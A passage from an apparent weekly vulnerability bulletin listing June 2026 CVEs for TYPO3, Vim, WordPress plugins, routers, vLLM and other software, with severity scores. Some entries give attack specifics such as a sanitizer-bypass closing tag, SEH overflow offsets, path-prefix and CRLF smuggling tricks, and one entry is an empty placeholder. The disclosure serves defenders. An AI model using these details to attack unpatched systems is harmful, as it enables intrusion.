| tngan--samlify | samlify is a Node.js library for SAML single sign-on. Prior to version 2.13.0, samlify's template substitution only escapes attribute contexts. Values inserted into element text (e.g., <saml:AttributeValue>) are not escaped. A normal user can inject XML markup into an attribute value (e.g., email, name) and add new <saml:Attribute> elements inside the signed assertion. The IdP then signs the tampered assertion and the SP accepts the injected attributes as trusted. This allows privilege escalation when attributes are used for authorization (roles/groups). This issue has been patched in version 2.13.0. | 2026-06-08 | not yet calculated | CVE-2026-46490 |
| TP-Link Systems Inc.--Archer AX12 V1 | An OS command injection vulnerability exists in the VPN module of TP-Link Archer AX12 v1, AX17 v1. AX18 v1, and AX1300 v1.6 routers. This vulnerability allows an adjacent, authenticated attacker to execute arbitrary commands on the device by importing a specially crafted VPN client configuration file. The issue stems from improper filtering of special characters. Successful exploitation of this vulnerability may enable an attacker to gain full control of the affected device, potentially compromising configuration integrity, network security, and service availability. | 2026-06-10 | not yet calculated | CVE-2026-9151 |
| TP-Link Systems Inc.--Archer MR600 v5 | A command Injection vulnerability exists in the WireGuard client configuration of Archer MR600 v5 due to improper neutralization of user-controlled input within the web management interface. An authenticated attacker with administrative privileges may be able to execute arbitrary commands when applying configuration changes.Successful exploitation may result in a full compromise of confidentiality, integrity, and availability of the affected device. | 2026-06-08 | not yet calculated | CVE-2026-8913 |
| TP-Link Systems Inc.--Tapo C110 v2 | An authenticated format string vulnerability exists in the ONVIF service of Tapo C110 v2 due to improper handling of user-controlled input. Externally controlled data is interpreted as a format string, which can be used to manipulate stack memory, including control flow data such as return addresses. A remote authenticated attacker may redirect execution flow to existing internal functions, triggering an unauthorized factory reset, leading to loss of configuration, deletion of stored credentials and service disruption. | 2026-06-11 | not yet calculated | CVE-2026-6250 |
| typesense--typesense | Typesense is a fast, typo-tolerant search engine. Prior to versions 29.1 and 30.2, there is an unauthenticated denial-of-service vulnerability in the /multi_search endpoint. A specially crafted request can trigger an unhandled exception during request processing, causing the server process to terminate. This issue can be exploited over the network without authentication and results in service unavailability. The duration of impact may vary depending on system configuration and dataset size. This issue has been patched in versions 29.1 and 30.2. | 2026-06-12 | not yet calculated | CVE-2026-47216 |
| typesense--typesense | Typesense is a fast, typo-tolerant search engine. Prior to versions 29.1 and 30.2, there is a cache isolation issue affecting search requests that use both server-side search result caching and Scoped Search API Keys. Under specific request ordering, cached search results could be reused across requests with different Scoped Search API Key constraints. This could result in a request receiving search results that should have been restricted by its Scoped Search API Key. This issue only affects search requests that use both server-side search result caching and Scoped Search API Keys with embedded filters to restrict access to search results within a collection. This vulnerability may result in unintended disclosure of search results across scoped authorization contexts. This issue has been patched in versions 29.1 and 30.2. | 2026-06-12 | not yet calculated | CVE-2026-47225 |
| TYPO3--HTML Sanitizer | When ALLOW_INSECURE_RAW_TEXT is enabled, whitespace-variant closing tags (e.g., </style\t>) are not recognized by the sanitizer but accepted by browsers as valid end tags, allowing subsequent content to escape sanitization. This allows bypassing the cross-site scripting prevention mechanism of typo3/html-sanitizer before version 2.3.2. | 2026-06-08 | not yet calculated | CVE-2026-47344 |
| TYPO3--HTML Sanitizer | Namespace attributes are not encoded correctly during HTML serialization. This allows bypassing the cross-site scripting prevention mechanism of typo3/html-sanitizer before version 2.3.2. | 2026-06-08 | not yet calculated | CVE-2026-47345 |
| TYPO3--TYPO3 CMS | Backend users with access to the Form Framework were able to use files not ending in .form.yaml as form definitions, which were processed without denying the incorrect file extension. Maliciously crafted form definition files can be used to execute arbitrary SQL statements, allowing attackers to escalate privileges by creating administrative backend user accounts. This issue affects TYPO3 CMS versions before 10.4.57, 11.0.0-11.5.51, 12.0.0-12.4.46, 13.0.0-13.4.31 and 14.0.0-14.3.3. | 2026-06-09 | not yet calculated | CVE-2026-11607 |
| TYPO3--TYPO3 CMS | Non-privileged backend users with file mount access were able to perform write operations (move, delete, rename) on folders representing the root of an active file mount due to missing authorization restrictions. This issue affects TYPO3 CMS versions before 10.4.57, 11.0.0 through 11.5.50, 12.0.0 through 12.4.45, 13.0.0 through 13.4.30, and 14.0.0 through 14.3.2. | 2026-06-09 | not yet calculated | CVE-2026-47343 |
| TYPO3--TYPO3 CMS | Backend users with file write permissions were able to upload form definition files with mixed-case extensions (e.g., .FORM.YAML) to bypass the Form Framework's upload restriction. Maliciously crafted form definition files can be used to execute arbitrary SQL statements, allowing attackers to escalate privileges by creating administrative backend user accounts. This issue affects TYPO3 CMS versions before 10.4.57, 11.0.0-11.5.50, 12.0.0-12.4.45, 13.0.0-13.4.30 and 14.0.0-14.3.2. | 2026-06-09 | not yet calculated | CVE-2026-47346 |
| TYPO3--TYPO3 CMS | Applications that use GeneralUtility::sanitizeLocalUrl to allow only local URLs are vulnerable to open redirect attacks if the URL is used after it has passed the aforementioned sanitization checks. This enables attackers to redirect users to external content and carry out phishing attacks. This issue affects TYPO3 CMS versions before 10.4.57, 11.0.0-11.5.50, 12.0.0-12.4.45, 13.0.0-13.4.30 and 14.0.0-14.3.2. | 2026-06-09 | not yet calculated | CVE-2026-47347 |
| TYPO3--TYPO3 CMS | Editors with access to create or modify page content were able to include HTML markup in page titles that were stored in the search index without sanitization. When displayed in frontend search results via the Indexed Search plugin, these titles were rendered without proper output encoding, resulting in a Cross-Site Scripting vulnerability. This issue affects TYPO3 CMS versions 13.0.0-13.4.30 and 14.0.0-14.3.2. | 2026-06-09 | not yet calculated | CVE-2026-47348 |
| TYPO3--TYPO3 CMS | Backend users with access to the Recycler module were able to restore soft-deleted records on pages or for tables they were not authorized to modify. This issue affects TYPO3 CMS versions before 10.4.57, 11.0.0-11.5.51, 12.0.0-12.4.46, 13.0.0-13.4.31 and 14.0.0-14.3.3. | 2026-06-09 | not yet calculated | CVE-2026-47349 |
| TYPO3--TYPO3 CMS | Backend users were able to move records to a different page without having edit permissions on the source page. This issue affects TYPO3 CMS versions 13.0.0-13.4.31 and 14.0.0-14.3.3. | 2026-06-09 | not yet calculated | CVE-2026-47350 |
| TYPO3--TYPO3 CMS | Backend users were able to insert arbitrary records and files into the TYPO3 clipboard without proper read permission checks, which allowed users to gather information about records and files they were not authorized to view. This issue affects TYPO3 CMS versions 10.4.0-13.4.30 and 14.0.0-14.3.2. | 2026-06-09 | not yet calculated | CVE-2026-47351 |
| TYPO3--TYPO3 CMS | Authenticated backend users were able to retrieve file metadata via several Backend API routes without proper permission checks, allowing access to files outside their permitted file mounts or storages. This issue affects TYPO3 CMS versions before 10.4.57, 11.0.0-11.5.51, 12.0.0-12.4.46, 13.0.0-13.4.31 and 14.0.0-14.3.3. | 2026-06-09 | not yet calculated | CVE-2026-47352 |
| TYPO3--TYPO3 CMS | The path allowance check in GeneralUtility::isAllowedAbsPath() performed a plain string prefix comparison without requiring a directory separator boundary, causing a path like /var/www/html-other/secret.yaml to be incorrectly accepted as valid when the project root was /var/www/html. Administrator users with access to the File Abstraction Layer were able to create new file storage definitions pointing to directories outside the project root, bypassing this path check. This issue affects TYPO3 CMS versions before 10.4.57, 11.0.0-11.5.51, 12.0.0-12.4.46, 13.0.0-13.4.31 and 14.0.0-14.3.3. | 2026-06-09 | not yet calculated | CVE-2026-49738 |
| TYPO3--TYPO3 CMS | TYPO3's cache frontend (VariableFrontend) and persistent key-value store (Registry) deserialized PHP payloads without integrity validation or class restrictions. An attacker with write access to the underlying storage backend (cache store or sys_registry database table) could inject a crafted serialized payload to trigger PHP Object Injection, potentially exploiting a gadget chain to achieve Remote Code Execution or other high-impact effects. Exploiting this vulnerability requires direct local write access to the storage, such as the SQL database or file system. This issue affects TYPO3 CMS versions before 10.4.57, 11.0.0-11.5.51, 12.0.0-12.4.46, 13.0.0-13.4.31 and 14.0.0-14.3.3. | 2026-06-09 | not yet calculated | CVE-2026-49740 |
| TYPO3--TYPO3 CMS | Backend users with write access to the form_definition database table were able to directly create, update, or delete form definition records via DataHandler, bypassing the Form Framework's persistence validation and permission checks. This allowed injecting arbitrary form configurations, re-enabling attack vectors originally addressed in TYPO3-CORE-SA-2018-003, including SQL injection and privilege escalation. This issue affects TYPO3 CMS versions 14.0.0-14.3.3. | 2026-06-09 | not yet calculated | CVE-2026-49741 |
| TYPO3--TYPO3 CMS | Backend users with file download permissions were able to download files from the fallback storage of the file abstraction layer (FAL) via the Media Module. Since the fallback storage resolves paths relative to the server's document root, this could expose sensitive files such as log files. This issue affects TYPO3 CMS versions 11.0.0-11.5.50, 12.0.0-12.4.45, 13.0.0-13.4.30 and 14.0.0-14.3.2. | 2026-06-09 | not yet calculated | CVE-2026-49742 |
| Unknown--Anti-Spam by CleanTalk. Spam protection | The Anti-Spam by CleanTalk. Spam protection WordPress plugin before 6.79 does not properly sanitize content within a custom shortcode used in its email-encoding feature, allowing unauthenticated attackers to inject arbitrary web scripts into approved comments that will execute when any user (including administrators) views the post. | 2026-06-10 | not yet calculated | CVE-2026-8071 |
| Unknown--Custom Block Builder | The Custom Block Builder WordPress plugin before 4.3.0 does not consistently check the unfiltered_html capability across all paths that write to its block template code fields, allowing administrators on multisite installations (or single-site installs with DISALLOW_UNFILTERED_HTML defined) to inject arbitrary JavaScript that executes for any visitor of pages embedding the affected block. | 2026-06-09 | not yet calculated | CVE-2026-8981 |
| Unknown--Iptanus File Upload | The Iptanus File Upload WordPress plugin before 5.1.7 does not implement proper file handling when the duplicatepolicy setting is configured to "maintain both." Due to a Time-of-Check to Time-of-Use (TOCTOU) race condition between the file existence check and the actual file write operation, an authenticated attacker can overwrite files uploaded by other users. | 2026-06-14 | not yet calculated | CVE-2025-15546 |
| Unknown--KeepInMind Dashboard Notes | Vulnerability Title | 2026-06-12 | not yet calculated | CVE-2026-9271 |
| Unknown--Schema & Structured Data for WP & AMP | The Schema & Structured Data for WP & AMP WordPress plugin before 1.60 does not check user capabilities on its frontend AJAX file-upload handlers and does not validate the actual content of uploaded files against the endpoint's intended media type, allowing unauthenticated users to upload any file type accepted by WordPress's media library through endpoints that should only accept images or videos. | 2026-06-10 | not yet calculated | CVE-2026-9067 |
| Unknown--Secure Copy Content Protection and Content Locking | The Secure Copy Content Protection and Content Locking WordPress plugin before 5.1.5 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). | 2026-06-12 | not yet calculated | CVE-2026-9269 |
| Unknown--Store Locator WordPress | The Store Locator WordPress plugin before 1.6.6 does not sanitize and escape one of its settings before storing it and outputting it on the Store Locator WordPress plugin before 1.6.6 admin page, allowing high-privileged users such as administrators to perform Stored Cross-Site Scripting attacks even when the `unfiltered_html` capability is disallowed (e.g. in a multisite network where the super admin visits the page). | 2026-06-10 | not yet calculated | CVE-2026-9060 |
| Unknown--Store Locator WordPress | The Store Locator WordPress plugin before 1.6.9 does not sanitize and escape store logo metadata before storing it and outputting it on the Store Locator WordPress plugin before 1.6.9 admin page, allowing high-privileged users such as administrators to perform Stored Cross-Site Scripting attacks even when the `unfiltered_html` capability is disallowed (e.g. in a multisite network). | 2026-06-13 | not yet calculated | CVE-2026-9061 |
| Unknown--Store Locator WordPress | The Store Locator WordPress plugin before 1.6.9 does not validate a parameter before using it in a file path, allowing high-privileged users such as administrators to read arbitrary `.php` files from the server, including configuration files that contain database credentials and authentication keys. | 2026-06-13 | not yet calculated | CVE-2026-9062 |
| Unknown--WPForms | The WPForms WordPress plugin before 1.10.0.5 does not verify the authenticity of incoming PayPal webhook events before processing them, allowing unauthenticated attackers to forge webhook payloads and manipulate the payment state of arbitrary transactions. | 2026-06-09 | not yet calculated | CVE-2026-4986 |
| Unknown--Xstore | The Xstore WordPress theme before 9.7.3 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection | 2026-06-10 | not yet calculated | CVE-2026-3326 |
| Veeam--Backup and Replication | A vulnerability allowing remote code execution (RCE) on the Backup Server by an authenticated domain user. | 2026-06-09 | not yet calculated | CVE-2026-44963 |
| vim--vim | Vim is an open source, command line text editor. Prior to version 9.2.0495, a Vimscript code injection vulnerability exists in s:NetrwBookHistSave() in the netrw plugin (runtime/pack/dist/opt/netrw/autoload/netrw.vim) when serializing browsed directory paths to the history file ~/.vim/.netrwhist. A directory name derived from the filesystem is interpolated into a single-quoted Vimscript string literal without escaping embedded single quotes, allowing a crafted directory name to break out of the string context and execute arbitrary Vimscript, including shell commands via system() and :!, the next time the history file is sourced. This issue has been patched in version 9.2.0495. | 2026-06-11 | not yet calculated | CVE-2026-47162 |
| vim--vim | Vim is an open source, command line text editor. Prior to version 9.2.0496, a code injection vulnerability exists in s:stepmatch() in the cucumber filetype plugin (runtime/ftplugin/cucumber.vim) on Vim builds with +ruby support. Step-definition patterns read from .rb files under the repository's features/*/ or stories/*/ directories are embedded into a Ruby Kernel.eval argument without sufficient escaping, allowing a crafted pattern in an attacker-controlled repository to execute arbitrary Ruby (and through it arbitrary shell commands) when the user invokes a step-jump mapping ([d, ]d). This issue has been patched in version 9.2.0496. | 2026-06-11 | not yet calculated | CVE-2026-47167 |
| vim--vim | Vim is an open source, command line text editor. Prior to version 9.2.0561, the Python omni-completion script in python3complete.vim for Vim with the +python3 interpreter enabled (and the legacy pythoncomplete.vim for builds with the +python interpreter) executes the import and from statements found in the current buffer through Python's import machinery. Because the buffer's working directory is on sys.path, opening a hostile .py file with a sibling Python package and invoking omni-completion runs that package's top-level code as the editing user. This issue has been patched in version 9.2.0561. | 2026-06-11 | not yet calculated | CVE-2026-52858 |
| vim--vim | Vim is an open source, command line text editor. Prior to version 9.2.0565, the update_snapshot() function in src/terminal.c copies the visible terminal screen into the scrollback buffer when a snapshot is taken. For each screen cell it walks the cell's chars[] array with no upper bound, stopping only when it encounters a NUL terminator. When a cell legitimately fills all VTERM_MAX_CHARS_PER_CELL (6) slots - a base character plus five combining marks - the bundled libvterm returns the array without a terminating NUL, so the loop reads past the fixed six-element array and appends the out-of-bounds values to a buffer reserved for only six characters. A program whose output is rendered inside a :terminal window can trigger this with a short byte sequence and no Vim scripting, leading to a crash. This issue has been patched in version 9.2.0565. | 2026-06-11 | not yet calculated | CVE-2026-52859 |
| vim--vim | Vim is an open source, command line text editor. Prior to version 9.2.0597, Vim's Python omni-completion executes reconstructed function and class definitions from the current buffer with exec() as part of populating the completion dictionary. Python evaluates function default values, parameter annotations, and class base expressions at definition time, so a hostile buffer can execute attacker-controlled Python expressions during omni-completion. The existing g:pythoncomplete_allow_import mitigation (GHSA-52mc-rq6p-rc7c) does not cover this path, because the attacker-controlled code is not a harvested import/from statement. This issue has been patched in version 9.2.0597. | 2026-06-11 | not yet calculated | CVE-2026-52860 |
| vivo--PcSuite | An unauthorized access vulnerability exists in the PcSuite APP. The vulnerability can be exploited by attackers to Unauthorized access to the victim's device. | 2026-06-12 | not yet calculated | CVE-2026-11535 |
| vivo--PcSuite | The connection confirmation pop-up of a specific feature in the PcSuite can be bypassed. | 2026-06-12 | not yet calculated | CVE-2026-12058 |
| vllm-project--vllm-project/vllm | vLLM versions 0.8.0 and later are vulnerable to an Out-of-Memory (OOM) Denial of Service (DoS) attack due to unbounded frame count processing in the `VideoMediaIO.load_base64()` method. When processing `video/jpeg` data URLs, the method splits the base64 data string on commas to extract individual JPEG frames without enforcing a frame count limit. An attacker can exploit this by crafting a single API request containing thousands of comma-separated base64-encoded JPEG frames in a data URL, causing the server to decode all frames into memory and crash due to excessive memory consumption. This vulnerability is reachable via the OpenAI-compatible chat completions API and does not require authentication. | 2026-06-11 | not yet calculated | CVE-2026-5497 |
| Waves Audio Ltd.--Waves Central | Waves Central for macOS versions 13.0.9 through 16.5.5 contain a local privilege escalation vulnerability. A trusted XPC client component included with the product is signed with hardened runtime entitlements that permit dynamic library injection. A local attacker can set the DYLD_INSERT_LIBRARIES environment variable to inject an attacker-controlled dynamic library into the trusted client process at launch. The injected code runs within the signed process and can connect to the product's privileged helper service to invoke privileged operations, resulting in arbitrary code execution as root. The issue is fixed in version 16.6.2. | 2026-06-09 | not yet calculated | CVE-2026-24064 |
| Waves Audio Ltd.--Waves Central | Waves Central for macOS versions 13.0.9 through 16.5.5 contain a local privilege escalation vulnerability in the privileged helper service. The helper validates connecting XPC clients using the client process identifier (PID) to verify code-signing identity. Because process identifiers can be reused, a local attacker can exploit a race condition between the time a connection request is made and the time the helper performs validation, causing the helper to trust an attacker-controlled process. This allows the attacker to invoke privileged operations, resulting in arbitrary code execution as root. The issue is fixed in version 16.6.2. | 2026-06-09 | not yet calculated | CVE-2026-24065 |
| Webkul--Bagisto | This vulnerability exists in Bagisto due to improper validation of user-supplied input in the ImageCacheController component. An unauthenticated remote attacker could exploit this vulnerability by sending crafted path traversal sequences through the filename parameter to access arbitrary files outside the intended directory on the targeted system. Successful exploitation of this vulnerability could allow an attacker to read arbitrary sensitive files on the targeted system. | 2026-06-08 | not yet calculated | CVE-2026-9506 |
| wojtekmach--req | Improper Handling of Highly Compressed Data (Data Amplification) vulnerability in wojtekmach Req allows attacker-controlled HTTP servers to exhaust memory in a Req client via decompression-bomb response bodies. Req's default response pipeline includes Req.Steps.decode_body/1 and Req.Steps.decompress_body/1 in lib/req/steps.ex. decode_body/1 dispatches on the server-supplied content-type (or URL extension) and calls :zip.extract(body, [:memory]) for application/zip, :erl_tar.extract({:binary, body}, [:memory]) for application/x-tar, and :erl_tar.extract({:binary, body}, [:memory, :compressed]) for application/gzip / .tgz. Each returns the full decompressed archive contents as a [{name, bytes}] list in memory, with no per-entry or total size cap. decompress_body/1 walks the content-encoding header and chains :zlib/:brotli/:ezstd decoders, so a response advertising content-encoding: gzip, gzip, gzip inflates through multiple layers without bound. Both steps are enabled by default, no caller opt-in is required, and the attacker controls the content-type and content-encoding headers on their own server (or on any host reached via Req's automatic redirect following). A sub-megabyte response can expand to multiple gigabytes on the victim, crashing the BEAM process. This issue affects req: from 0.1.0 before 0.6.1. | 2026-06-08 | not yet calculated | CVE-2026-49755 |
| wojtekmach--req | Improper Neutralization of CRLF Sequences ('CRLF Injection') vulnerability in wojtekmach Req allows multipart parameter smuggling via attacker-influenced part metadata. Req.Utils.encode_form_part/2 in lib/req/utils.ex builds the per-part headers by interpolating the caller-supplied name, filename, and content_type values directly into the content-disposition and content-type lines with no escaping or CRLF stripping. A value containing ", \r, or \n closes the surrounding quoted value and starts a new header line; an additional \r\n--<boundary> terminates the current part and prepends a smuggled part of the attacker's choosing. This is reachable through every supported way of supplying a part. It is particularly easy when value is a %File.Stream{}, because filename then defaults to Path.basename(stream.path) and POSIX filenames may legitimately contain \r and \n. Any application that forwards user-controlled filenames (or field names / MIME types) through Req.post/2 with form_multipart: lets an attacker inject arbitrary headers into the outgoing multipart body or smuggle additional fields and parts into the request the victim service sends downstream. This issue affects req: from 0.5.3 before 0.6.0. | 2026-06-08 | not yet calculated | CVE-2026-49756 |
| X-VPN--X-VPN macOS website | A vulnerability in the quarantine and restore workflow of the X-VPN macOS website versions 77.0 through 77.5 allow a local attacker to leverage a race condition and symlink manipulation to achieve privileged file corruption. | 2026-06-09 | not yet calculated | CVE-2026-2638 |
Vulnerability Summary for the Week of June 1, 2026
Posted on Monday June 08, 2026
High Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|
| 10Web--Photo Gallery by 10Web | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in 10Web Photo Gallery by 10Web allows Blind SQL Injection. This issue affects Photo Gallery by 10Web: from n/a through 1.8.41. | 2026-06-04 | 7.6 | CVE-2026-49771 |
| AAM Plugin--Advanced Access Manager | Authentication Bypass by Spoofing vulnerability in AAM Plugin Advanced Access Manager allows URL Encoding. This issue affects Advanced Access Manager: from n/a through 7.1.0. | 2026-06-01 | 7.5 | CVE-2026-42674 |
| ABB--T-MAC Plus | Files or directories accessible to external parties vulnerability in ABB T-MAC Plus. This issue affects T-MAC Plus: 4.0-24. | 2026-06-03 | 9.9 | CVE-2025-14771 |
| ABB--T-MAC Plus | Authorization bypass through User-Controlled key vulnerability in ABB T-MAC Plus. This issue affects T-MAC Plus: 4.0-24. | 2026-06-03 | 8.8 | CVE-2025-14772 |
| ABB--T-MAC Plus | Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in ABB T-MAC Plus. This issue affects T-MAC Plus: 4.0-24. | 2026-06-03 | 8 | CVE-2025-14773 |
| ABB--T-MAC Plus | Incorrect Authorization vulnerability in ABB T-MAC Plus. This issue affects T-MAC Plus: 4.0-24. | 2026-06-03 | 7.4 | CVE-2025-14774 |
| ad-manager-wd--Ad Manager WD | WordPress Plugin ad manager wd 1.0.11 contains an arbitrary file download vulnerability that allows unauthenticated attackers to download sensitive files by manipulating the path parameter. Attackers can send GET requests to the edit.php endpoint with export=export_csv and a malicious path parameter to read arbitrary files like wp-config.php accessible to the web server. | 2026-06-04 | 9.8 | CVE-2019-25727 |
| Ahmad--WP Job Portal | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Ahmad WP Job Portal allows Blind SQL Injection. This issue affects WP Job Portal: from n/a through 2.5.1. | 2026-06-02 | 9.3 | CVE-2026-42684 |
| Ahmad--WP Job Portal | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ahmad WP Job Portal allows Reflected XSS. This issue affects WP Job Portal: from n/a through 2.5.1. | 2026-06-02 | 7.1 | CVE-2026-42685 |
| Akmer Informatics Automation Industry and Trade Ltd. Co.--TeknoPass | Authorization bypass through User-Controlled SQL primary key vulnerability in Akmer Informatics Automation Industry and Trade Ltd. Co. TeknoPass allows SQL Injection. This issue affects TeknoPass: from 20210501 through 20260429. | 2026-06-04 | 9.8 | CVE-2026-4104 |
| alfio-event--alf.io | alf.io is an open source ticket reservation system for conferences, trade shows, workshops, and meetups. Prior to version 2.0-M5-2606, a sandbox escape vulnerability in the alf.io extension script engine allows an authenticated administrator to execute arbitrary operating system commands on the server. The extension system is intended to execute restricted JavaScript in a sandboxed Rhino environment; however, a combination of an unguarded injected Java object (`returnClass`) and an incomplete AST blocklist allows the sandbox to be fully escaped using Java reflection without triggering any validation errors. Version 2.0-M5-2606 patches the issue. | 2026-06-02 | 8 | CVE-2026-35482 |
| Allplayer--AllPlayer | AllPlayer 7.4 contains a local buffer overflow vulnerability in URL handling that allows attackers to overwrite structured exception handling pointers by supplying an excessively long URL string. Attackers can craft a malicious URL, paste it into the Open URL dialog, and trigger SEH-based code execution to run arbitrary commands with user privileges. | 2026-06-04 | 8.4 | CVE-2019-25735 |
| androThemes--Cookiteer | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in androThemes Cookiteer allows PHP Local File Inclusion. This issue affects Cookiteer: from n/a through 1.4.8. | 2026-06-02 | 8.1 | CVE-2025-68886 |
| Anionex--banana-slides | Banana Slides through 0.4.0, patched in commit e8bc490, contains a path traversal vulnerability in the generate_image() function within the AI service backend that allows unauthenticated attackers to read arbitrary image-format files outside the intended uploads directory by exploiting an incomplete path prefix check using os.path.startswith() without a trailing separator. Attackers can supply crafted markdown image references in user-controlled page descriptions that resolve to sibling directories whose names share the uploads folder prefix, bypassing the directory confinement check and causing the application to read files from unintended locations via PIL Image.open(). | 2026-06-01 | 7.5 | CVE-2026-49136 |
| Apache Software Foundation--Apache MINA | ZDRES-232: resolveProxyClass Not Overridden - acceptMatchers Filter Bypass via java.lang.reflect.Proxy Assessment: Fully addressed. When the serialised stream contains a TC_PROXYCLASSDESC (the marker for a java.lang.reflect.Proxy ), JDK's ObjectInputStream.readProxyDesc() is dispatched. JDK then calls the default ObjectInputStream.resolveProxyClass(interfaces) implementation, which performs Class.forName(intf, false, latestUserDefinedLoader()) for EACH interface name and constructs the proxy class " bypassing the accepted classes list . ZDRES-233: Class.forName(name, initialize=true, classLoader) in readClassDescriptor Triggers Static Initialiser of Allow-Listed Classes Assessment: Fully addressed. For ANY class on the allow-list, deserialising a stream that names it triggers the class's (static initialiser) BEFORE any instance is constructed. This means an attacker who supplies a class name on the allow-list (e.g., the developer wrote accept("com.myapp.*") , attacker supplies com.myapp.SomeClass ) causes <clinit> of SomeClass" and many real-world classes have side-effecting static initialisers Both issues have been fixed. | 2026-06-03 | 9.8 | CVE-2026-47065 |
| Apache Software Foundation--Apache MINA SSHD | Path traversal vulnerability in Apache MINA SSHD bundle sshd-git. Lack of path validation in git-upload-pack, git-receive-pack, and other git operations allows users authenticated over SSH access to git repositories outside the configured git server root directory. Applications are affected if they use org.apache.sshd:sshd-git. Applications not using sshd-git are not affected. Users are advised to upgrade affected applications to Apche MINA SSHD 2.18.0, which fixes the issue. The issue also is present in the pre-release milestones 3.0.0-M1 to 3.0.0-M3 for a new upcoming new major version 3.0.0. Again, applications are affected only if they use sshd-git. Upgrade affected applications to 3.0.0-M4. We would like to point out that a professional git server should not rely solely on file system layout and permissions, but should implement additional security controls to govern access to git repositories and operations allowed on particular git repositories. | 2026-06-01 | 7.1 | CVE-2026-48827 |
| Apache Software Foundation--Apache Solr | Hardcoded credentials in the Basic Authentication setup tool (bin/solr auth enable) in Apache Solr versions 9.4.0 through 9.10.1 and 10.0.0 allows a remote attacker to gain full administrative access to the cluster via publicly known default credentials installed silently alongside the user-specified account. As an immediate workaround without upgrading, delete the template users (superadmin, admin, search, index) from security.json or change their passwords. The future, not yet released, versions 9.11.0 and 10.1.0 will not be vulnerable, and it will be enough to upgrade to solve the issue. Not affected: * Clusters where bin/solr auth enable was not used to bootstrap BasicAuth * Clusters where template users have been assigned strong passwords after bootstrap | 2026-06-01 | 8.1 | CVE-2026-44825 |
| Arista Networks--EOS | Affected platforms running Arista EOS with OpenConfig configured, a gNMI Set request can be run when it should have been rejected. This can result in unexpected configuration being applied to the switch. | 2026-06-04 | 9.6 | CVE-2024-27890 |
| Arista Networks--EOS | Affected platforms running Arista EOS with OpenConfig configured, a gNMI Set request can be run when it should have been rejected. This can result in unexpected configuration being applied to the switch. | 2026-06-04 | 9.6 | CVE-2024-27892 |
| Arista Networks--EOS | On affected platforms running Arista EOS with IPsec configured, a specially crafted packet can cause the dataplane to stop processing all IPsec traffic. The control plane may detect this condition, and attempt to reset the IPsec processing pipeline. After reset traffic may not resume being processed. There is no impact to non-IPsec traffic or to IPsec traffic not originating or terminating on the system. This issue was reported by an Arista customer. | 2026-06-04 | 7.5 | CVE-2025-8873 |
| Arista Networks--EOS / CloudVision eXchange (CVX) | An authenticated Redis session could be used to obtain full root access to all servers in the CVX cluster. Note that this would require an attacker to have both network access to the Redis service on a CVX server and the Redis password. Please note that all Redis communication, including authentication, occurs over plaintext in the present day. TLS support is tracked under RFE1294850. | 2026-06-05 | 8.3 | CVE-2025-5088 |
| Armcode--Arm Whois | Arm Whois 3.11 contains a stack-based buffer overflow vulnerability that allows remote attackers to execute arbitrary code by supplying oversized input to the IP address or domain field. Attackers can craft malicious input exceeding 658 bytes with shellcode to overwrite the structured exception handler and gain command execution when the application processes the input. | 2026-06-01 | 9.8 | CVE-2018-25427 |
| Armcode--Arm Whois | Arm Whois 3.11 contains a buffer overflow vulnerability that allows local attackers to execute arbitrary code by overwriting the structured exception handler. Attackers can craft a malicious input file with a 672-byte offset to overwrite the nSEH and SEH pointers, enabling code execution through exception handler hijacking. | 2026-06-01 | 8.4 | CVE-2018-25432 |
| armember--ARMember Premium Membership Plugin, Content Restriction, Member Levels, User Profile & User signup | The ARMember Premium plugin for WordPress is vulnerable to an insecure password reset mechanism in all versions up to, and including, 7.3.1. The plugin stores a plaintext copy of the password reset key in the `arm_reset_password_key` user meta field when a user requests a password reset. This is in addition to the hashed key that WordPress core stores securely in `wp_users.user_activation_key`. The plaintext key stored in `wp_usermeta` can be used with the plugin's custom `armrp` reset action to set a new password for any user. Combined with another vulnerability such as SQL Injection (CVE-2026-5073, CVE-2026-5074), this makes it possible for unauthenticated attackers to extract the plaintext reset key and take over any user account, including administrators. | 2026-06-02 | 9.8 | CVE-2026-5076 |
| armember--ARMember Premium Membership Plugin, Content Restriction, Member Levels, User Profile & User signup | The ARMember Premium plugin for WordPress is vulnerable to SQL Injection via the 'order' parameter of the 'arm_directory_paging_action' AJAX action in all versions up to, and including, 7.3.1. This is due to insufficient escaping on the user-supplied 'order' and 'orderby' parameters and the lack of sufficient preparation on the existing SQL query in the `arm_get_directory_members()` function. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2026-06-02 | 7.5 | CVE-2026-5073 |
| AsyncHttpClient--async-http-client | The AsyncHttpClient (AHC) library allows Java applications to easily execute HTTP requests and asynchronously process HTTP responses. Versions on the 2.x branch prior to 2.15.0 and the 3.x branch prior to 3.0.10 leak `Cookie` headers to cross-origin redirect targets. When following a redirect to a different origin, the `propagatedHeaders()` method in `Redirect30xInterceptor.java` strips `Authorization` and `Proxy-Authorization` headers but does not strip the `Cookie` header, causing session cookies and other sensitive cookie values to be sent to attacker-controlled servers. Versions 2.15.0 and 3.0.10 patch the issue. | 2026-06-05 | 7.4 | CVE-2026-45300 |
| AWS--AWS Advanced Go Wrapper | An untrusted search path issue in the GlobalDatabasePlugin in the AWS Advanced Go Wrapper for Amazon Aurora PostgreSQL will allow a remote authenticated low-privilege actor to escalate privileges to those of another Amazon RDS user, including rds_superuser, via a crafted function created by the actor that runs when that user connects to the cluster through the affected wrapper. To remediate this issue, users should upgrade to the AWS Advanced Go Wrapper release 2026-05-26 | 2026-06-05 | 8 | CVE-2026-11401 |
